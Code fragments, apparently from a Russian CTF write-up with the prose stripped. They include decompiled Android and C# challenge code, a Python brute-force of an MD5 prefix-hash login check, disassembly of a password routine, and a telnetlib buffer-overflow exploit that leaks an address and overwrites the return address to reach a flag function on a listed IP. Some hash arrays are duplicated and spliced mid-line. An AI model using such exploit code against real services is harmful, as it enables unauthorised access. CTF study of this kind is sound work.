public boolean onKeyDown(int paramInt, KeyEvent paramKeyEvent) { switch (paramInt) { default: return super.onKeyDown(paramInt, paramKeyEvent); case 82: } startActivity(new Intent(this, InputOne.class)); return true; }
public class InputOne extends Activity { protected void onCreate(Bundle paramBundle) { super.onCreate(paramBundle); setContentView(2130903041); EditText localEditText = (EditText)findViewById(2131034112); ((Button)findViewById(2131034113)).setOnClickListener(new View.OnClickListener(localEditText) { public void onClick(View paramView) { String str1 = this.val$editText.getText().toString(); if (new File("/sdcard/key.txt").exists()) { String str2 = Simple.Decrypt(str1); Toast.makeText(InputOne.this.getBaseContext(), str2, 1).show(); return; } try { Simple.get(str1); return; } catch (IOException localIOException) { localIOException.printStackTrace(); } } }); } }
public static void get(String paramString) throws IOException { QueryString localQueryString = new QueryString().add("message", paramString); if (localQueryString == null) Log.e("Info", "NULL"); for (URLConnection localURLConnection = new URL("http://79.175.2.83/0b32bd28a8632f9895f9d5d8a6c51dad/game.php").openConnection(); ; localURLConnection = new URL("http://79.175.2.83/0b32bd28a8632f9895f9d5d8a6c51dad/game.php?" + localQueryString).openConnection()) { localURLConnection.getInputStream(); String str = readStreamToString(localURLConnection.getInputStream(), "UTF-8"); Log.e("Info", str); if (!str.equals("Error")) { FileWriter localFileWriter = new FileWriter(new File("/sdcard/key.txt")); localFileWriter.write(str); localFileWriter.close(); } return; } }
public static String Decrypt(String paramString) { ArrayList localArrayList = new ArrayList(); try { Scanner localScanner = new Scanner(new File("/sdcard/key.txt")); while (localScanner.hasNextLine()) localArrayList.add(localScanner.nextLine()); } catch (FileNotFoundException localFileNotFoundException) { return "0"; } BigInteger localBigInteger = new BigInteger((String)localArrayList.get(0)); if (new BigInteger((String)localArrayList.get(1)).modPow(e, n).equals(localBigInteger)) { new File("/sdcard/key.txt").delete(); return localBigInteger.modPow(new BigInteger(paramString), n).toString(16); } return "0"; }
private void textBox1_TextChanged(object sender, EventArgs e) { string text = this.textBox1.Text; if (text.Length == 0) { this.label1.Text = "Enter you login"; } else if (!this.hashes.Contains<string>(this.GetHashString(text))) { this.label1.Text = "Incorrect login!"; } else if (text.Length == 0x20) { this.label1.Text = "You have successfully logged in!"; this.groupBox1.Enabled = false; this.tcpSocket = new TcpClient(this.host, this.port); this.groupBox2.Visible = true; this.timer1.Start(); } else { this.label1.Text = "Enter next character of your login"; } }
else if (!this.hashes.Contains<string>(this.GetHashString(text)))
private string GetHashString(string s) { byte[] bytes = Encoding.ASCII.GetBytes(s); byte[] buffer2 = new MD5CryptoServiceProvider().ComputeHash(bytes); string str = string.Empty; foreach (byte num in buffer2) { str = str + string.Format("{0:x2}", num); } return str; }
this.hashes = new string[] { "dfa7b3505d612417911b86b89f869d6c", "73b6951965fda60be0c69da1411e59af", "4ad9eab6a9bd83eec4723d05444059e2", "4f60dca64aedd943e4fccb8bbf18e25c", "9ed2ac984ed7182a4974a4bab0ad8fcd", "826fc5d7998c16eeb77abc00702a00ab", "4ec559ee5a6249f0c69ab8ff9b804072", "0eebdd1e6d919d04cdee9646607786c3", "172cfbcb9d8de7425233fd7183f43c21", "7174ce70d0702083e26d285196d36cf2", "77526663ec282d1d1f62229ab980edd5", "c7f399fb9f981ba2445ba573ec668cef", "efa9d9d29367af2b3c1cc1494f882f2d", "01e5f7d323222fd161fcbd0b32f26b2b", "83daec0d569704618ecf60d19b031082", "a2c2c74263df7545cb857b69ce5820b2", "ac13be701bc79036602ae9f355e6c389", "d33bf0c58b48508c706d32c6e8a171d4", "138378fc00ad7d559f0418019e750b19", "39eb98f5edec84e35f52feff51c94a25", "3ff5db4ebc8437f338ce978fddcfb334", "e1cd7a2a000a2fe69f909a2e46dab073", "bf80eafce6f8d51220dd6603295852d5", "f8bc2fbe2c937ea5b5e8839cbea69491", "e8bb39c756ad2b46a80b3f07c8422037", "a3d4832c6cc0b51163e04301e6a17b55", "bc7a6cff6c8507488e186d378ec12b38", "deaeb78d2c64a16cecd1a718e226db52", "c81e728d9d4c2f636f067f89cc14862c", "7742638106aea26564f3f6fa02fe1265", "7c8104aa5e88bee40658c61c5f869284", "71e157ffdf45f4946e95d0ac115466a1" };
"4ad9eab6a9bd83eec4723d05444059e2", "4f60dca64aedd943e4fccb8bbf18e25c", "9ed2ac984ed7182a4974a4bab0ad8fcd", "826fc5d7998c16eeb77abc00702a00ab", "4ec559ee5a6249f0c69ab8ff9b804072", "0eebdd1e6d919d04cdee9646607786c3", "172cfbcb9d8de7425233fd7183f43c21", "7174ce70d0702083e26d285196d36cf2", "77526663ec282d1d1f62229ab980edd5", "c7f399fb9f981ba2445ba573ec668cef", "efa9d9d29367af2b3c1cc1494f882f2d this.hashes = new string[] { "dfa7b3505d612417911b86b89f869d6c", "73b6951965fda60be0c69da1411e59af", "4ad9eab6a9bd83eec4723d05444059e2", "4f60dca64aedd943e4fccb8bbf18e25c", "9ed2ac984ed7182a4974a4bab0ad8fcd", "826fc5d7998c16eeb77abc00702a00ab", "4ec559ee5a6249f0c69ab8ff9b804072", "0eebdd1e6d919d04cdee9646607786c3", "172cfbcb9d8de7425233fd7183f43c21", "7174ce70d0702083e26d285196d36cf2", "77526663ec282d1d1f62229ab980edd5", "c7f399fb9f981ba2445ba573ec668cef", "efa9d9d29367af2b3c1cc1494f882f2d", "01e5f7d323222fd161fcbd0b32f26b2b", "83daec0d569704618ecf60d19b031082", "a2c2c74263df7545cb857b69ce5820b2", "ac13be701bc79036602ae9f355e6c389", "d33bf0c58b48508c706d32c6e8a171d4", "138378fc00ad7d559f0418019e750b19", "39eb98f5edec84e35f52feff51c94a25", "3ff5db4ebc8437f338ce978fddcfb334", "e1cd7a2a000a2fe69f909a2e46dab073", "bf80eafce6f8d51220dd6603295852d5", "f8bc2fbe2c937ea5b5e8839cbea69491", "e8bb39c756ad2b46a80b3f07c8422037", "a3d4832c6cc0b51163e04301e6a17b55", "bc7a6cff6c8507488e186d378ec12b38", "deaeb78d2c64a16cecd1a718e226db52", "c81e728d9d4c2f636f067f89cc14862c", "7742638106aea26564f3f6fa02fe1265", "7c8104aa5e88bee40658c61c5f869284", "71e157ffdf45f4946e95d0ac115466a1" };
"138378fc00ad7d559f0418019e750b19", "39eb98f5edec84e35f52feff51c94a25", "3ff5db4ebc8437f338ce978fddcfb334", "e1cd7a2a000a2fe69f909a2e46dab073", "bf80eafce6f8d51220dd6603295852d5", "f8bc2fbe2c937ea5b5e8839cbea69491", "e8bb39c756ad2b46a80b3f07c8422037", "a3d4832c6cc0b51163e04301e6a17b55", "bc7a6cff6c8507488e186d378ec12b38", "deaeb78d2c64a16cecd1a718e226db52", "c81e728d9d4c2f636f067f89cc14862c this.hashes = new string[] { "dfa7b3505d612417911b86b89f869d6c", "73b6951965fda60be0c69da1411e59af", "4ad9eab6a9bd83eec4723d05444059e2", "4f60dca64aedd943e4fccb8bbf18e25c", "9ed2ac984ed7182a4974a4bab0ad8fcd", "826fc5d7998c16eeb77abc00702a00ab", "4ec559ee5a6249f0c69ab8ff9b804072", "0eebdd1e6d919d04cdee9646607786c3", "172cfbcb9d8de7425233fd7183f43c21", "7174ce70d0702083e26d285196d36cf2", "77526663ec282d1d1f62229ab980edd5", "c7f399fb9f981ba2445ba573ec668cef", "efa9d9d29367af2b3c1cc1494f882f2d", "01e5f7d323222fd161fcbd0b32f26b2b", "83daec0d569704618ecf60d19b031082", "a2c2c74263df7545cb857b69ce5820b2", "ac13be701bc79036602ae9f355e6c389", "d33bf0c58b48508c706d32c6e8a171d4", "138378fc00ad7d559f0418019e750b19", "39eb98f5edec84e35f52feff51c94a25", "3ff5db4ebc8437f338ce978fddcfb334", "e1cd7a2a000a2fe69f909a2e46dab073", "bf80eafce6f8d51220dd6603295852d5", "f8bc2fbe2c937ea5b5e8839cbea69491", "e8bb39c756ad2b46a80b3f07c8422037", "a3d4832c6cc0b51163e04301e6a17b55", "bc7a6cff6c8507488e186d378ec12b38", "deaeb78d2c64a16cecd1a718e226db52", "c81e728d9d4c2f636f067f89cc14862c", "7742638106aea26564f3f6fa02fe1265", "7c8104aa5e88bee40658c61c5f869284", "71e157ffdf45f4946e95d0ac115466a1" };
import hashlib hashes = ( 'dfa7b3505d612417911b86b89f869d6c', '73b6951965fda60be0c69da1411e59af', '4ad9eab6a9bd83eec4723d05444059e2', '4f60dca64aedd943e4fccb8bbf18e25c', '9ed2ac984ed7182a4974a4bab0ad8fcd', '826fc5d7998c16eeb77abc00702a00ab', '4ec559ee5a6249f0c69ab8ff9b804072', '0eebdd1e6d919d04cdee9646607786c3', '172cfbcb9d8de7425233fd7183f43c21', '7174ce70d0702083e26d285196d36cf2', '77526663ec282d1d1f62229ab980edd5', 'c7f399fb9f981ba2445ba573ec668cef', 'efa9d9d29367af2b3c1cc1494f882f2d', '01e5f7d323222fd161fcbd0b32f26b2b', '83daec0d569704618ecf60d19b031082', 'a2c2c74263df7545cb857b69ce5820b2', 'ac13be701bc79036602ae9f355e6c389', 'd33bf0c58b48508c706d32c6e8a171d4', '138378fc00ad7d559f0418019e750b19', '39eb98f5edec84e35f52feff51c94a25', '3ff5db4ebc8437f338ce978fddcfb334', 'e1cd7a2a000a2fe69f909a2e46dab073', 'bf80eafce6f8d51220dd6603295852d5', 'f8bc2fbe2c937ea5b5e8839cbea69491', 'e8bb39c756ad2b46a80b3f07c8422037', 'a3d4832c6cc0b51163e04301e6a17b55', 'bc7a6cff6c8507488e186d378ec12b38', 'deaeb78d2c64a16cecd1a718e226db52', 'c81e728d9d4c2f636f067f89cc14862c', '7742638106aea26564f3f6fa02fe1265', '7c8104aa5e88bee40658c61c5f869284', '71e157ffdf45f4946e95d0ac115466a1' ) login = '' chars = 'abcdef1234567890' for i in range(32): for j in range(len(chars)): hash = hashlib.md5((login + chars[j]).encode('utf-8')).hexdigest() if hash in hashes: login += chars[j] print(login)
this.host = "79.175.2.85"; this.port = 0x1f90;
public StartTest StartTest proc near s2= byte ptr -20h push rbp mov rbp, rsp sub rsp, 20h lea rdi, aHello ; "\nHello!\n" call _puts mov rax, cs:pGetFlag_ptr mov rdx, cs:GetFlag_ptr mov [rax], rdx lea rsi, modes ; "r" lea rdi, aHomeSrvPass_tx ; "/home/srv/pass.txt" call _fopen …
loc_DD4: ; seconds mov edi, 1 call _sleep lea rax, [rbp+s2] lea rdx, [rbp+s2] add rdx, 10h mov rsi, rax ; s2 mov rdi, rdx ; s1 call _strcmp test eax, eax jnz short loc_D7A
mov rax, cs:stdin_ptr mov rdx, [rax] ; stream lea rax, [rbp+s2] mov esi, 64h ; n mov rdi, rax ; s call _fgets
struct info { char entered_pass[16]; char correct_pass[16]; };
public GetFlag GetFlag proc near s= byte ptr -70h stream= qword ptr -8 push rbp mov rbp, rsp sub rsp, 70h lea rsi, modes ; "r" lea rdi, filename ; "/home/srv/flag3.txt" call _fopen …
\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
import telnetlib import re tn = telnetlib.Telnet('79.175.2.85', 8080) read = tn.read_until(b"password: ").decode() print(read) tn.write(b'aaaaaaaaaaaaaaaaa\r\n') read = tn.read_until(b"password: ").decode() print(read) p = re.compile(r'\(StartTest\+0xd0\) \[(.+?)\]', re.MULTILINE | re.DOTALL) m = p.search(read) addr = (hex(int(m.group(1), 16) - 208 - 271))[2:] raddr = '' raddr += addr[10]; raddr += addr[11]; raddr += addr[8]; raddr += addr[9]; raddr += addr[6]; raddr += addr[7]; raddr += addr[4]; raddr += addr[5]; raddr += addr[2]; raddr += addr[3]; raddr += addr[0]; raddr += addr[1]; raddr = raddr.decode('hex') tn.write(b'\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + raddr + '\x00\x00\n') read = tn.read_until(b"password: ").decode() print("") print(read)
Source: https://habr.com/ru/post/258169/
All Articles